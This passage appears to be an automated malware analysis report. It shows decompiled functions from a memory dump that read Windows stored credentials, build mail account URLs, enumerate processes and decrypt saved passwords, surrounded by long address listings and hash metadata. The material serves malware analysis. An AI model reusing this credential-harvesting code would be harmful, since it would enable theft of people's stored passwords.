                                                                                                                                                                  0x0040ceac
                                                                                                                                                                  0x0040cead
                                                                                                                                                                  0x0040ceb3
                                                                                                                                                                  0x0040ceb4
                                                                                                                                                                  0x0040cebd
                                                                                                                                                                  0x0040cecf
                                                                                                                                                                  0x0040cecf
                                                                                                                                                                  0x0040ced2
                                                                                                                                                                  0x0040cede
                                                                                                                                                                  0x0040cdfc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cee4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cebf
                                                                                                                                                                  0x0040cecd
                                                                                                                                                                  0x0040cef2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cecd
                                                                                                                                                                  0x0040cdfe
                                                                                                                                                                  0x0040cdbd
                                                                                                                                                                  0x0040cdc0
                                                                                                                                                                  0x0040cdcc
                                                                                                                                                                  0x0040cdc2
                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                  0x0040cdce
                                                                                                                                                                  0x0040cdd0
                                                                                                                                                                  0x0040cdd5
                                                                                                                                                                  0x0040cdd6
                                                                                                                                                                  0x0040cddb
                                                                                                                                                                  0x0040cde0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cde0
                                                                                                                                                                  0x0040cef9
                                                                                                                                                                  0x0040ceff

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                                                                                                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                  • API String ID: 4281260487-2229823034
                                                                                                                                                                  • Opcode ID: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
                                                                                                                                                                  • Instruction ID: 2d12b684a12309e3f166330e45fd276d2d431d1b057f0c9926c0b37ed6681b29
                                                                                                                                                                  • Opcode Fuzzy Hash: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
                                                                                                                                                                  • Instruction Fuzzy Hash: BE41B172604205DFD724DBA4C9C1F97B7E8AF08304F10467BE649E3281D778E955CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040CD80, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E0040CD80(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t39;
				void* _t55;
				char* _t56;
				intOrPtr _t62;
				void* _t63;
				char* _t64;
				void* _t69;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				void* _t101;

				_t100 = _t99 - 0x4cc;
				_t94 = _a4;
				_t89 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
					_t39 = 0;
				} else {
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t39);
				L004120D2();
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					L9:
					_a4 = 0;
					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
						while(1) {
							_t91 = E0040DA96(_a4, _t89 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t91 + 0x104; // 0x104
							_t18 = _t91 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t91 + 0x104; // 0x104
							_t21 = _t91 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t55 = 0;
							_t101 = _t101 + 0x38;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t55);
							_t56 =  &_v620;
							_push(_t56);
							L00412072();
							if(_t56 == 0) {
								goto L18;
							}
							_t63 = 0;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t63);
							_t64 =  &_v1232;
							_push(_t64);
							L00412072();
							if(_t64 != 0) {
								L19:
								_a4 = _a4 + 1;
								_t62 = _v8;
								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
									_t89 = _t62;
									continue;
								} else {
								}
							} else {
								goto L18;
							}
							goto L22;
							L18:
							if( *((char*)(E00406B3E( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
								E0040132A(_t59 + 1, _t91 + 0x304, 0xff);
							} else {
								goto L19;
							}
							goto L22;
						}
					}
				} else {
					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
						_t69 = 0;
					} else {
						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t69);
					L004120D2();
					_t101 = _t101 + 0xc;
					if(_t69 == 0) {
						goto L9;
					}
				}
				L22:
				return 1;
			}






















                                                                                                                                                                  0x0040cd85
                                                                                                                                                                  0x0040cd8d
                                                                                                                                                                  0x0040cd96
                                                                                                                                                                  0x0040cd98
                                                                                                                                                                  0x0040cd9b
                                                                                                                                                                  0x0040cda7
                                                                                                                                                                  0x0040cd9d
                                                                                                                                                                  0x0040cda2
                                                                                                                                                                  0x0040cda2
                                                                                                                                                                  0x0040cda9
                                                                                                                                                                  0x0040cdab
                                                                                                                                                                  0x0040cdb0
                                                                                                                                                                  0x0040cdb1
                                                                                                                                                                  0x0040cdb6
                                                                                                                                                                  0x0040cdbb
                                                                                                                                                                  0x0040cde6
                                                                                                                                                                  0x0040cdec
                                                                                                                                                                  0x0040cdef
                                                                                                                                                                  0x0040cdfe
                                                                                                                                                                  0x0040ce0d
                                                                                                                                                                  0x0040ce18
                                                                                                                                                                  0x0040ce1f
                                                                                                                                                                  0x0040ce2e
                                                                                                                                                                  0x0040ce35
                                                                                                                                                                  0x0040ce3a
                                                                                                                                                                  0x0040ce41
                                                                                                                                                                  0x0040ce54
                                                                                                                                                                  0x0040ce59
                                                                                                                                                                  0x0040ce60
                                                                                                                                                                  0x0040ce73
                                                                                                                                                                  0x0040ce78
                                                                                                                                                                  0x0040ce7a
                                                                                                                                                                  0x0040ce80
                                                                                                                                                                  0x0040ce87
                                                                                                                                                                  0x0040ce87
                                                                                                                                                                  0x0040ce8a
                                                                                                                                                                  0x0040ce8b
                                                                                                                                                                  0x0040ce91
                                                                                                                                                                  0x0040ce92
                                                                                                                                                                  0x0040ce9b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ce9d
                                                                                                                                                                  0x0040cea2
                                                                                                                                                                  0x0040cea9
                                                                                                                                                                  0x0040cea9
                                                                                                                                                                  0x0040ceac
                                                                                                                                                                  0x0040cead
                                                                                                                                                                  0x0040ceb3
                                                                                                                                                                  0x0040ceb4
                                                                                                                                                                  0x0040cebd
                                                                                                                                                                  0x0040cecf
                                                                                                                                                                  0x0040cecf
                                                                                                                                                                  0x0040ced2
                                                                                                                                                                  0x0040cede
                                                                                                                                                                  0x0040cdfc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cee4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cebf
                                                                                                                                                                  0x0040cecd
                                                                                                                                                                  0x0040cef2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cecd
                                                                                                                                                                  0x0040cdfe
                                                                                                                                                                  0x0040cdbd
                                                                                                                                                                  0x0040cdc0
                                                                                                                                                                  0x0040cdcc
                                                                                                                                                                  0x0040cdc2
                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                  0x0040cdce
                                                                                                                                                                  0x0040cdd0
                                                                                                                                                                  0x0040cdd5
                                                                                                                                                                  0x0040cdd6
                                                                                                                                                                  0x0040cddb
                                                                                                                                                                  0x0040cde0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cde0
                                                                                                                                                                  0x0040cef8
                                                                                                                                                                  0x0040ceff

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                                                                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                  • API String ID: 2822975062-2229823034
                                                                                                                                                                  • Opcode ID: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                                                                                                                                                                  • Instruction ID: b4ee7e9bcea435462912fc28dba82f8fd87397000d83f7605d7513f68c800710
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C417E72604205EFD724DBA4C9C1F96B7E8AF18304F00467BE64AE3281D778F995CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040820D, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E0040820D(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E00412360(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x418488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4182c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E00408208, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407FBF(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00408155, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4182c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4181b4 =  *0x4181b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00408065(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}











                                                                                                                                                                  0x0040820d
                                                                                                                                                                  0x0040820d
                                                                                                                                                                  0x00408215
                                                                                                                                                                  0x0040821a
                                                                                                                                                                  0x0040821f
                                                                                                                                                                  0x00408265
                                                                                                                                                                  0x00408269
                                                                                                                                                                  0x0040826f
                                                                                                                                                                  0x00408278
                                                                                                                                                                  0x0040827a
                                                                                                                                                                  0x00408290
                                                                                                                                                                  0x00408290
                                                                                                                                                                  0x0040829e
                                                                                                                                                                  0x004082bf
                                                                                                                                                                  0x004082c9
                                                                                                                                                                  0x004082cf
                                                                                                                                                                  0x004082e0
                                                                                                                                                                  0x004082e6
                                                                                                                                                                  0x004082ec
                                                                                                                                                                  0x004082fa
                                                                                                                                                                  0x00408300
                                                                                                                                                                  0x00408308
                                                                                                                                                                  0x0040830f
                                                                                                                                                                  0x0040827c
                                                                                                                                                                  0x0040828a
                                                                                                                                                                  0x0040828a
                                                                                                                                                                  0x0040828c
                                                                                                                                                                  0x0040828e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040827e
                                                                                                                                                                  0x00408281
                                                                                                                                                                  0x00408287
                                                                                                                                                                  0x00408287
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408287
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408281
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040828a
                                                                                                                                                                  0x00408316
                                                                                                                                                                  0x00408316
                                                                                                                                                                  0x00408221
                                                                                                                                                                  0x0040822e
                                                                                                                                                                  0x0040823c
                                                                                                                                                                  0x00408242
                                                                                                                                                                  0x00408249
                                                                                                                                                                  0x0040824b
                                                                                                                                                                  0x0040824d
                                                                                                                                                                  0x0040824e
                                                                                                                                                                  0x00408251
                                                                                                                                                                  0x0040825a
                                                                                                                                                                  0x0040825a
                                                                                                                                                                  0x0040831c

                                                                                                                                                                  APIs
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040822E
                                                                                                                                                                  • LoadMenuA.USER32 ref: 0040823C
                                                                                                                                                                    • Part of subcall function 00408065: GetMenuItemCount.USER32 ref: 0040807A
                                                                                                                                                                    • Part of subcall function 00408065: memset.MSVCRT ref: 0040809B
                                                                                                                                                                    • Part of subcall function 00408065: GetMenuItemInfoA.USER32 ref: 004080D6
                                                                                                                                                                    • Part of subcall function 00408065: strchr.MSVCRT ref: 004080ED
                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040825A
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040829E
                                                                                                                                                                  • CreateDialogParamA.USER32(?,00000000,00000000,00408208,00000000), ref: 004082B3
                                                                                                                                                                  • memset.MSVCRT ref: 004082CF
                                                                                                                                                                  • GetWindowTextA.USER32 ref: 004082E0
                                                                                                                                                                  • EnumChildWindows.USER32 ref: 00408308
                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0040830F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                  • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                  • API String ID: 3259144588-3822380221
                                                                                                                                                                  • Opcode ID: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
                                                                                                                                                                  • Instruction ID: bbac317cb8ff6209085768228bd9594f53373bc5c39c5be55c638663b0a3ff3e
                                                                                                                                                                  • Opcode Fuzzy Hash: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
                                                                                                                                                                  • Instruction Fuzzy Hash: 33210532540148BFDF12AF60DD45EEF3B68EB55706F0440BEFA41A1190DBB99E948B2D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E6C7, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040E6C7() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x418514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x417fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x417fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x417fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x417e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x417fcc = _t2;
								if(_t2 != 0) {
									 *0x418514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                                                                  0x0040e6ce
                                                                                                                                                                  0x0040e74a
                                                                                                                                                                  0x0040e74a
                                                                                                                                                                  0x0040e6d6
                                                                                                                                                                  0x0040e6dc
                                                                                                                                                                  0x0040e6e0
                                                                                                                                                                  0x0040e749
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e749
                                                                                                                                                                  0x0040e6ef
                                                                                                                                                                  0x0040e6f3
                                                                                                                                                                  0x0040e6f8
                                                                                                                                                                  0x0040e700
                                                                                                                                                                  0x0040e704
                                                                                                                                                                  0x0040e709
                                                                                                                                                                  0x0040e711
                                                                                                                                                                  0x0040e715
                                                                                                                                                                  0x0040e71a
                                                                                                                                                                  0x0040e722
                                                                                                                                                                  0x0040e726
                                                                                                                                                                  0x0040e72b
                                                                                                                                                                  0x0040e733
                                                                                                                                                                  0x0040e737
                                                                                                                                                                  0x0040e73c
                                                                                                                                                                  0x0040e73e
                                                                                                                                                                  0x0040e73e
                                                                                                                                                                  0x0040e73c
                                                                                                                                                                  0x0040e72b
                                                                                                                                                                  0x0040e71a
                                                                                                                                                                  0x0040e709
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040E377), ref: 0040E6D6
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E6EF
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E700
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E711
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E722
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E733
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                                                                  • Opcode ID: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
                                                                                                                                                                  • Instruction ID: 5b748ad6718b7057422386d5a916c05b319ca6e7afffd602bf2aa3a230b78167
                                                                                                                                                                  • Opcode Fuzzy Hash: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
                                                                                                                                                                  • Instruction Fuzzy Hash: E6F086B0AC5306A9E750CB26AD84FAB2DF85B85B81719403BF404F22D4DB7884428B6D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404651, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404651(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046CC(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046CC(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}






                                                                                                                                                                  0x00404652
                                                                                                                                                                  0x00404654
                                                                                                                                                                  0x0040465e
                                                                                                                                                                  0x00404666
                                                                                                                                                                  0x00404668
                                                                                                                                                                  0x00404680
                                                                                                                                                                  0x0040468c
                                                                                                                                                                  0x00404698
                                                                                                                                                                  0x004046a4
                                                                                                                                                                  0x004046ad
                                                                                                                                                                  0x004046b1
                                                                                                                                                                  0x004046c2
                                                                                                                                                                  0x004046b9
                                                                                                                                                                  0x004046b9
                                                                                                                                                                  0x004046b9
                                                                                                                                                                  0x004046b1
                                                                                                                                                                  0x004046cb

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004046CC: FreeLibrary.KERNEL32(?,00404659,?,0040DC5F,80000001,7479F420), ref: 004046D3
                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,7479F420), ref: 0040465E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                  • API String ID: 2449869053-4258758744
                                                                                                                                                                  • Opcode ID: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
                                                                                                                                                                  • Instruction ID: ff9940379d8f3ddc00738bb66027861fd390550b24bba25458702abe812256fc
                                                                                                                                                                  • Opcode Fuzzy Hash: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F012CB0A447019ACB30AF75C809B56BAF4AF94705B218D2EE1C5A36A0E77E9181CF58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004116BE, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E004116BE(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E00412360(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00411533(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BE2A( &_v132);
						E0040BE4E(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BEEC( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BE2A( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BE4E(_t109,  &_v132);
						E0040BEEC( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BE2A(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BE4E(_t122, _t181);
						E0040BEEC( &_v39, _t181,  &_v5348);
						E00405364( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053E0( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053E0(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BE2A( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BE4E(_t67,  &_v132, _a12);
						E0040BEEC(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}







































                                                                                                                                                                  0x004116be
                                                                                                                                                                  0x004116c6
                                                                                                                                                                  0x004116ce
                                                                                                                                                                  0x004116dd
                                                                                                                                                                  0x004116e3
                                                                                                                                                                  0x004116fc
                                                                                                                                                                  0x004116ff
                                                                                                                                                                  0x00411709
                                                                                                                                                                  0x0041170c
                                                                                                                                                                  0x00411712
                                                                                                                                                                  0x00411714
                                                                                                                                                                  0x00411722
                                                                                                                                                                  0x00411723
                                                                                                                                                                  0x00411724
                                                                                                                                                                  0x00411733
                                                                                                                                                                  0x00411739
                                                                                                                                                                  0x00411747
                                                                                                                                                                  0x0041174d
                                                                                                                                                                  0x0041175b
                                                                                                                                                                  0x00411761
                                                                                                                                                                  0x00411768
                                                                                                                                                                  0x0041176e
                                                                                                                                                                  0x0041176f
                                                                                                                                                                  0x00411770
                                                                                                                                                                  0x00411771
                                                                                                                                                                  0x00411778
                                                                                                                                                                  0x00411781
                                                                                                                                                                  0x00411787
                                                                                                                                                                  0x0041178f
                                                                                                                                                                  0x0041179d
                                                                                                                                                                  0x004117a9
                                                                                                                                                                  0x004117ac
                                                                                                                                                                  0x004117be
                                                                                                                                                                  0x004117c8
                                                                                                                                                                  0x004117d3
                                                                                                                                                                  0x004117d6
                                                                                                                                                                  0x004117d9
                                                                                                                                                                  0x004117e5
                                                                                                                                                                  0x004117fa
                                                                                                                                                                  0x0041180c
                                                                                                                                                                  0x00411813
                                                                                                                                                                  0x0041181e
                                                                                                                                                                  0x00411821
                                                                                                                                                                  0x00411824
                                                                                                                                                                  0x00411830
                                                                                                                                                                  0x0041184f
                                                                                                                                                                  0x00411867
                                                                                                                                                                  0x0041186c
                                                                                                                                                                  0x00411871
                                                                                                                                                                  0x00411879
                                                                                                                                                                  0x00411881
                                                                                                                                                                  0x00411884
                                                                                                                                                                  0x00411886
                                                                                                                                                                  0x004118a1
                                                                                                                                                                  0x004118a6
                                                                                                                                                                  0x004118ac
                                                                                                                                                                  0x004118af
